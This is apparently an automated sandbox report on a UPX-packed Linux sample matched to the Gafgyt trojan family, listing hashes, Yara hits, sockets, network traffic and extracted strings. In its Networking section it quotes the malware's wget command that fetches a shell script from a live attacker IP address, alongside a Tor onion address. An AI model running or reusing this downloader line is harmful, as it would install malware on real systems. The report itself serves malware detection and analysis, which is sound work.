Linux Analysis Report
x86_64.bin.elf

Overview

General Information

Sample name: x86_64.bin.elf
Analysis ID: 1541867
MD5: c309d84aff381e7831ba2bd5ac72d973
SHA1: 95571a6646766419973682da7bb4a7dfbc64b65e
SHA256: bd958006ac58d9e9659025a4800c2dfc7003fb93a8fca4fc1c63f349ad688a60
Tags: elfuser-abuse_ch

Detection

Score: 56
Range: 0 - 100
Whitelisted: false

Signatures

Malicious sample detected (through community Yara rule)
Found Tor onion address
Sample is packed with UPX
Detected TCP or UDP traffic on non-standard ports
ELF contains segments with high entropy indicating compressed/encrypted content
Sample contains only a LOAD segment without any section mappings
Sample listens on a socket
Tries to connect to HTTP servers, but all servers are down (expired dropper behavior)
Yara signature match

Classification

Networking

Source: x86_64.bin.elf, 6258.1.000000c000000000.000000c000800000.rw-.sdmp String found in binary or memory: disable\\disable\\true\\3\\90\\true\\100|100000\\true\\wget http://185.196.10.215:12234/hi.sh\\ypohwtgf2675muzlafm6zajxd76cirfhe75htwrvadjpf3bm7erri4id.onion\\80\\true
Source: x86_64.bin.elf, 6258.1.000000c000000000.000000c000800000.rw-.sdmp String found in binary or memory: disable\\disable\\true\\3\\90\\true\\100|100000\\true\\wget http://185.196.10.215:12234/hi.sh\\ypohwtgf2675muzlafm6zajxd76cirfhe75htwrvadjpf3bm7erri4id.onion\\80\\truex
Source: x86_64.bin.elf, 6258.1.000000c000000000.000000c000800000.rw-.sdmp String found in binary or memory: disable\\disable\\true\\3\\90\\true\\100|100000\\true\\wget http://185.196.10.215:12234/hi.sh\\ypohwtgf2675muzlafm6zajxd76cirfhe75htwrvadjpf3bm7erri4id.onion\\80\\true@s
Source: global traffic TCP traffic: 192.168.2.23:37932 -> 198.50.207.21:1024
Source: /tmp/x86_64.bin.elf (PID: 6258) Socket: 127.0.0.1:4628
Source: /tmp/x86_64.bin.elf (PID: 6264) Socket: 127.0.0.1:23
Source: /tmp/x86_64.bin.elf (PID: 6264) Socket: 0.0.0.0:0
Source: /tmp/x86_64.bin.elf (PID: 6264) Socket: 127.0.0.1:80
Source: global traffic TCP traffic: 192.168.2.23:42836 -> 91.189.91.43:443
Source: global traffic TCP traffic: 192.168.2.23:42516 -> 109.202.202.202:80
Source: global traffic TCP traffic: 192.168.2.23:43928 -> 91.189.91.42:443
Source: unknown TCP traffic detected without corresponding DNS query: 91.189.91.43
Source: unknown TCP traffic detected without corresponding DNS query: 109.202.202.202
Source: unknown TCP traffic detected without corresponding DNS query: 91.189.91.42
Source: unknown TCP traffic detected without corresponding DNS query: 198.50.207.21
Source: x86_64.bin.elf, 6258.1.000000c000000000.000000c000800000.rw-.sdmp String found in binary or memory: http://185.196.10.215:12234/hi.sh
Source: x86_64.bin.elf, 6258.1.000000c000000000.000000c000800000.rw-.sdmp String found in binary or memory: http://help.yahoo.com/help/us/shop/merchant/)
Source: x86_64.bin.elf, 6258.1.000000c000000000.000000c000800000.rw-.sdmp String found in binary or memory: http://help.yahoo.com/help/us/shop/merchant/)Mozilla/5.0
Source: x86_64.bin.elf, 6258.1.000000c000000000.000000c000800000.rw-.sdmp String found in binary or memory: http://help.yahoo.com/help/us/ysearch/slurp)
Source: x86_64.bin.elf, 6258.1.000000c000000000.000000c000800000.rw-.sdmp String found in binary or memory: http://help.yahoo.com/help/us/ysearch/slurp)Mozilla/5.0
Source: x86_64.bin.elf, 6258.1.000000c000000000.000000c000800000.rw-.sdmp String found in binary or memory: http://http://uhttp://uphttp://upxhttp://upx.http://upx.shttp://upx.sfhttp://upx.sf.nethttp://upx.sf
Source: x86_64.bin.elf, 6258.1.000000c000000000.000000c000800000.rw-.sdmp String found in binary or memory: http://upx.sf
Source: x86_64.bin.elf, 6258.1.000000c000000000.000000c000800000.rw-.sdmp String found in binary or memory: http://upx.sf.
Source: x86_64.bin.elf, 6258.1.000000c000000000.000000c000800000.rw-.sdmp String found in binary or memory: http://upx.sf.n
Source: x86_64.bin.elf, 6258.1.000000c000000000.000000c000800000.rw-.sdmp String found in binary or memory: http://upx.sf.neU
Source: x86_64.bin.elf String found in binary or memory: http://upx.sf.net
Source: x86_64.bin.elf, 6258.1.000000c000000000.000000c000800000.rw-.sdmp String found in binary or memory: http://upx.sf.nethttp://upx.sf.netCONFIG:
Source: x86_64.bin.elf, 6258.1.000000c000000000.000000c000800000.rw-.sdmp String found in binary or memory: http://www.google.com/bot.html)
Source: x86_64.bin.elf, 6258.1.000000c000000000.000000c000800000.rw-.sdmp String found in binary or memory: http://www.google.com/bot.html)Mozilla/5.0
Source: x86_64.bin.elf, 6258.1.000000c000000000.000000c000800000.rw-.sdmp String found in binary or memory: http://www.googlebot.com/bot.html)
Source: x86_64.bin.elf, 6258.1.000000c000000000.000000c000800000.rw-.sdmp String found in binary or memory: http://www.googlebot.com/bot.html)Mozilla/4.0
Source: unknown Network traffic detected: HTTP traffic on port 43928 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 42836 -> 443

System Summary

Source: 6258.1.000000c000000000.000000c000800000.rw-.sdmp, type: MEMORY Matched rule: Linux_Trojan_Gafgyt_28a2fe0c Author: unknown
Source: Process Memory Space: x86_64.bin.elf PID: 6258, type: MEMORYSTR Matched rule: Linux_Trojan_Gafgyt_28a2fe0c Author: unknown
Source: LOAD without section mappings Program segment: 0x400000
Source: 6258.1.000000c000000000.000000c000800000.rw-.sdmp, type: MEMORY Matched rule: Linux_Trojan_Gafgyt_28a2fe0c os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = a2c6beaec18ca876e8487c11bcc7a29279669588aacb7d3027d8d8df8f5bcead, id = 28a2fe0c-eed5-4c79-81e6-3b11b73a4ebd, last_modified = 2021-09-16
Source: Process Memory Space: x86_64.bin.elf PID: 6258, type: MEMORYSTR Matched rule: Linux_Trojan_Gafgyt_28a2fe0c os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = a2c6beaec18ca876e8487c11bcc7a29279669588aacb7d3027d8d8df8f5bcead, id = 28a2fe0c-eed5-4c79-81e6-3b11b73a4ebd, last_modified = 2021-09-16
Source: classification engine Classification label: mal56.evad.linELF@0/0@0/0

Data Obfuscation

Source: initial sample String containing UPX found: $Info: This file is packed with the UPX executable packer http://upx.sf.net $
Source: initial sample String containing UPX found: $Id: UPX 4.02 Copyright (C) 1996-2023 the UPX Team. All Rights Reserved. $
Source: x86_64.bin.elf Submission file: segment LOAD with 7.8235 entropy (max. 8.0)
Source: x86_64.bin.elf Submission file: segment LOAD with 7.9999 entropy (max. 8.0)
Source: x86_64.bin.elf Binary or memory string: vmCio